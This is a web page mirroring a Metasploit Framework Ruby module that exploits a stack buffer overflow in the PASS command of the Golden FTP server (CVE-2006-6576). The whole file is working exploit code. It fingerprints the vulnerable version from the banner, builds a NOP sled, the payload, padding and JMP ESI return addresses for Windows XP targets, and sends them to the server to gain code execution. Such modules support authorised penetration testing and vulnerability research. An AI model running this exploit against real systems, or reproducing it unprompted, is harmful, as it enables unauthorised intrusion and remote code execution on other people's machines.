Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/goldenftp_pass_bof.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Ftp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'GoldenFTP PASS Stack Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a vulnerability in the Golden FTP service, using the PASS

18
          command to cause a buffer overflow.  Please note that in order trigger the vulnerable

19
          code, the victim machine must have the "Show new connections" setting enabled.  By

20
          default, this option is unchecked.

21
        },

22
        'Author' => [

23
          'Craig Freyman', # Initial poc on exploit-db with iglesiasgg

24
          'bannedit', # Initial msf module

25
          'Joff Thyer <jsthyer[at]gmail.com>', # Improved msf version

26
        ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          [ 'CVE', '2006-6576'],

30
          [ 'OSVDB', '35951'],

31
          [ 'BID', '45957'],

32
          [ 'EDB', '16036'],

33
        ],

34
        'DefaultOptions' => {

35
          'EXITFUNC' => 'seh',

36
        },

37
        'Privileged' => false,

38
        'Payload' => {

39
          'Space' => 440,

40
          'BadChars' => "\x00\x0a\x0d",

41
        },

42
        'Platform' => ['win'],

43
        'Targets' => [

44
          [ 'Windows XP Pro SP3', { 'Ret' => 0x7E45AE4E, } ], # JMP ESI USER32.dll

45
          [ 'Windows XP Pro SP2', { 'Ret' => 0x77D4E23B, } ],     # JMP ESI USER32.dll

46
          [ 'Windows XP Pro SP0/SP1', { 'Ret' => 0x77e8157b, } ]  # JMP ESI kernel32.dll

47
        ],

48
        'DisclosureDate' => '2011-01-23',

49
        'Notes' => {

50
          'Reliability' => UNKNOWN_RELIABILITY,

51
          'Stability' => UNKNOWN_STABILITY,

52
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

53
        }

54
      )

55
    )

56
  end

57


58
  def check

59
    connect

60
    disconnect

61
    vprint_status("FTP Banner: #{banner}".strip)

62
    if banner =~ /Golden FTP Server ready v(4\.\d{2})/ and $1 == "4.70"

63
      return Exploit::CheckCode::Appears

64
    else

65
      return Exploit::CheckCode::Safe

66
    end

67
  end

68


69
  def exploit

70
    shortjmp = make_nops(3) + "\xeb\x20"

71
    nopsled = make_nops(1) * 60

72
    srciplen = Rex::Socket.source_address.length

73
    padding = make_nops(1) * (533 - (srciplen + nopsled.length + payload.encoded.length))

74


75
    sploit = nopsled

76
    sploit << payload.encoded

77
    sploit << padding

78
    sploit << [target.ret].pack('V')

79


80
    print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}")

81


82
    connect

83
    raw_send(shortjmp + "\n")

84
    send_user(datastore['FTPUSER'])

85
    send_cmd(['PASS', sploit], false)

86
    select(nil, nil, nil, 2)

87
    handler

88
    disconnect

89
  end

90
end

91


92